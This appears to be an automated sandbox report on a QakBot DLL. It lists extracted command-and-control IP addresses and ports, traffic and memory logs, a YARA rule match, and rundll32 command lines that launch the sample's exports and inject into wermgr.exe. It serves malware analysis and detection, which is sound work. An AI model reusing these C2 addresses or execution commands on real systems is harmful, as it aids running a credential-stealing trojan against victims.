Source: Malware configuration extractor	IPs: 76.16.49.134:443
Source: Malware configuration extractor	IPs: 70.28.50.223:32100
Source: Malware configuration extractor	IPs: 12.172.173.82:465
Source: Malware configuration extractor	IPs: 76.170.252.153:995
Source: Malware configuration extractor	IPs: 184.182.66.109:443
Source: Malware configuration extractor	IPs: 78.92.133.215:443
Source: Malware configuration extractor	IPs: 50.68.204.71:993
Source: Malware configuration extractor	IPs: 186.75.95.6:443
Source: Malware configuration extractor	IPs: 113.11.92.30:443
Source: Malware configuration extractor	IPs: 70.28.50.223:3389
Source: Malware configuration extractor	IPs: 98.145.23.67:443
Source: Malware configuration extractor	IPs: 85.57.212.13:3389
Source: Malware configuration extractor	IPs: 50.68.186.195:443
Source: Malware configuration extractor	IPs: 47.205.25.170:443
Source: Malware configuration extractor	IPs: 12.172.173.82:993
Source: Malware configuration extractor	IPs: 12.172.173.82:22
Source: Malware configuration extractor	IPs: 69.242.31.249:443
Source: Malware configuration extractor	IPs: 81.101.185.146:443
Source: Malware configuration extractor	IPs: 79.168.224.165:2222
Source: Malware configuration extractor	IPs: 75.143.236.149:443
Source: Malware configuration extractor	IPs: 14.192.241.76:995
Source: Malware configuration extractor	IPs: 86.195.14.72:2222
Source: Malware configuration extractor	IPs: 81.229.117.95:2222
Source: Malware configuration extractor	IPs: 220.240.164.182:443
Source: Malware configuration extractor	IPs: 73.29.92.128:443
Source: Malware configuration extractor	IPs: 12.172.173.82:21
Source: Malware configuration extractor	IPs: 96.56.197.26:2222
Source: Malware configuration extractor	IPs: 75.109.111.89:443
Source: Malware configuration extractor	IPs: 76.86.31.59:443
Source: Malware configuration extractor	IPs: 201.244.108.183:995
Source: Malware configuration extractor	IPs: 68.203.69.96:443
Source: Malware configuration extractor	IPs: 124.122.47.148:443
Source: Malware configuration extractor	IPs: 122.184.143.86:443
Source: Malware configuration extractor	IPs: 92.186.69.229:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:2083
Source: Malware configuration extractor	IPs: 89.129.109.27:2222
Source: Malware configuration extractor	IPs: 147.147.30.126:2222
Source: Malware configuration extractor	IPs: 125.99.76.102:443
Source: Malware configuration extractor	IPs: 88.126.94.4:50000
Source: Malware configuration extractor	IPs: 151.65.167.77:443
Source: Malware configuration extractor	IPs: 86.132.236.117:443
Source: Malware configuration extractor	IPs: 92.154.17.149:2222
Source: Malware configuration extractor	IPs: 223.166.13.95:995
Source: Malware configuration extractor	IPs: 89.36.206.69:995
Source: Malware configuration extractor	IPs: 96.56.197.26:2083
Source: Malware configuration extractor	IPs: 78.18.105.11:443
Source: Malware configuration extractor	IPs: 82.127.153.75:2222
Source: Malware configuration extractor	IPs: 90.78.147.141:2222
Source: Malware configuration extractor	IPs: 82.131.141.209:443
Source: Malware configuration extractor	IPs: 183.87.163.165:443
Source: Malware configuration extractor	IPs: 92.9.45.20:2222
Source: Malware configuration extractor	IPs: 80.6.50.34:443
Source: Malware configuration extractor	IPs: 80.12.88.148:2222
Source: Malware configuration extractor	IPs: 69.133.162.35:443
Source: Malware configuration extractor	IPs: 172.115.17.50:443
Source: Malware configuration extractor	IPs: 95.45.50.93:2222
Source: Malware configuration extractor	IPs: 12.172.173.82:2087
Source: Malware configuration extractor	IPs: 103.140.174.20:2222
Source: Malware configuration extractor	IPs: 24.198.114.130:995
Source: Malware configuration extractor	IPs: 50.68.204.71:443
Source: Malware configuration extractor	IPs: 69.119.123.159:2222
Source: Malware configuration extractor	IPs: 64.121.161.102:443
Source: Malware configuration extractor	IPs: 2.82.8.80:443
Source: Malware configuration extractor	IPs: 184.181.75.148:443
Source: Malware configuration extractor	IPs: 70.112.206.5:443
Source: Malware configuration extractor	IPs: 198.2.51.242:993
Source: Malware configuration extractor	IPs: 2.36.64.159:2078
Source: Malware configuration extractor	IPs: 79.77.142.22:2222
Source: Malware configuration extractor	IPs: 84.215.202.8:443
Source: Malware configuration extractor	IPs: 147.219.4.194:443
Source: Malware configuration extractor	IPs: 116.74.164.81:443
Source: Malware configuration extractor	IPs: 70.28.50.223:2078
Source: Malware configuration extractor	IPs: 12.172.173.82:995
Source: Malware configuration extractor	IPs: 77.86.98.236:443
Source: Malware configuration extractor	IPs: 104.35.24.154:443
Source: Malware configuration extractor	IPs: 213.64.33.61:2222
Source: Malware configuration extractor	IPs: 47.149.134.231:443
Source: Malware configuration extractor	IPs: 72.134.124.16:443
Source: Malware configuration extractor	IPs: 47.34.30.133:443
Source: Malware configuration extractor	IPs: 103.42.86.42:995
Source: Malware configuration extractor	IPs: 174.4.89.3:443
Source: Malware configuration extractor	IPs: 161.142.103.187:995
Source: Malware configuration extractor	IPs: 78.160.146.127:443
Source: Malware configuration extractor	IPs: 84.35.26.14:995
Source: Malware configuration extractor	IPs: 12.172.173.82:20
Source: Malware configuration extractor	IPs: 70.28.50.223:2078
Source: Malware configuration extractor	IPs: 124.149.143.189:2222
Source: Malware configuration extractor	IPs: 70.160.67.203:443
Source: Malware configuration extractor	IPs: 186.64.67.30:443
Source: Malware configuration extractor	IPs: 103.123.223.133:443
Source: Malware configuration extractor	IPs: 188.28.19.84:443
Source: Malware configuration extractor	IPs: 174.58.146.57:443
Source: Malware configuration extractor	IPs: 94.207.104.225:443
Source: Malware configuration extractor	IPs: 86.97.55.89:2222
Source: Malware configuration extractor	IPs: 69.123.4.221:2222

Source: Joe Sandbox View	ASN Name: MEO-RESIDENCIALPT MEO-RESIDENCIALPT
Source: Joe Sandbox View	ASN Name: ASN-CXA-ALL-CCI-22773-RDCUS ASN-CXA-ALL-CCI-22773-RDCUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 2.82.8.80 2.82.8.80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1

Source: unknown

Network traffic detected: IP country count 30

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 124.122.47.148
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown	TCP traffic detected without corresponding DNS query: 151.65.167.77

Source: national[1].htm.24.dr

String found in binary or memory: Find tutorials and demos\u003C\u002Fa\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Ca rel=\"nofollow\" href=\"https:\u002F\u002Fwww.facebook.com\u002Fxfinity\"\u003EFacebook equals www.facebook.com (Facebook)

Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, rundll32.exe, 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.488551661.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.495622337.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.504031322.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.504159065.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.508750049.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F086.dll	String found in binary or memory: https://streams.videolan.org/upload/
Source: national[1].htm.24.dr	String found in binary or memory: https://www.xfinity.com/learn/internet-service/acp
Source: national[1].htm.24.dr	String found in binary or memory: https://www.xfinity.com/mobile/policies/broadband-disclosures
Source: national[1].htm.24.dr	String found in binary or memory: https://www.xfinity.com/networkmanagement

Source: unknown

DNS traffic detected: queries for: xfinity.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1

Source: unknown

HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.6:49717 version: TLS 1.2

Source: loaddll32.exe, 00000000.00000002.498797073.000000000061B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: F086.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: 18.2.rundll32.exe.280c00.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 18.2.rundll32.exe.41b0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 18.2.rundll32.exe.280c00.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000D060	3_2_1000D060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10028070	3_2_10028070
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002B0B0	3_2_1002B0B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000B0D0	3_2_1000B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10008144	3_2_10008144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002A1A1	3_2_1002A1A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100101D0	3_2_100101D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001021B	3_2_1001021B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10027220	3_2_10027220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10033261	3_2_10033261
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10007270	3_2_10007270
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10024280	3_2_10024280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002334C	3_2_1002334C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100353B0	3_2_100353B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100243C0	3_2_100243C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10013480	3_2_10013480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000D4D0	3_2_1000D4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001F523	3_2_1001F523
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100105C0	3_2_100105C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100215D0	3_2_100215D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000164B	3_2_1000164B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041C8D30	18_2_041C8D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041C71FF	18_2_041C71FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041C320D	18_2_041C320D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041B3A40	18_2_041B3A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041C6E40	18_2_041C6E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041C4A6F	18_2_041C4A6F

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041BA412 NtAllocateVirtualMemory,NtWriteVirtualMemory,	18_2_041BA412
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041BA823 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,	18_2_041BA823
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041BCA0F NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,	18_2_041BCA0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_041C43F4 NtProtectVirtualMemory,NtProtectVirtualMemory,	18_2_041C43F4

Source: F086.dll

Binary or memory string: OriginalFilenameavutil-lav-57.dll. vs F086.dll

Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ncryptsslp.dll

Source: F086.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\F086.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 660
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 652
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_q
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_stable
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 652
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_i
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_q
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_stable
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",next
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_license
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_configuration
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F086.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_q	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_stable	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_i	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_q	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mv_add_stable	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",next	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_license	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",mvutil_configuration	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F086.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior

Source: C:\Windows\SysWOW64\wermgr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Zvymxv

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1714.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@31/23@2/100

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_041BD213 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

18_2_041BD213

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_041BC71C CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,

18_2_041BC71C

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F086.dll,mv_add_i

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7152
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7044
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess684
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7A3715E8-0BDD-4F96-8281-195EB8CC5AFD}
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B7F1BC99-C279-4D6A-A285-6E2D7EAC45D6}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6716
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{7A3715E8-0BDD-4F96-8281-195EB8CC5AFD}
